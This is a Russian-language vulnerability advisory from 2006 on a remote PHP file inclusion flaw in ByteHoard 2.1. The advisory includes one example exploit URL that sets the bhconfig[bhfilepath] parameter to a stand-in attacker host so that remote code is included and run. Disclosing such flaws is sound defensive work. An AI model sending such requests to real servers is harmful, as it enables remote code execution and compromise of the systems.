PHP-инклюдинг в ByteHoard

Дата публикации:
08.06.2006
Всего просмотров:
969
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Повышение привилегий
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ByteHoard 2.x
Уязвимые версии: ByteHoard 2.1 Epsilon, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "bhconfig[bhfilepath]" в сценарии includes/webdav/server.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker

URL производителя: bytehoard.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Bytehoard 2.1 (server.php) Remote File Include Vulnerability

или введите имя

CAPTCHA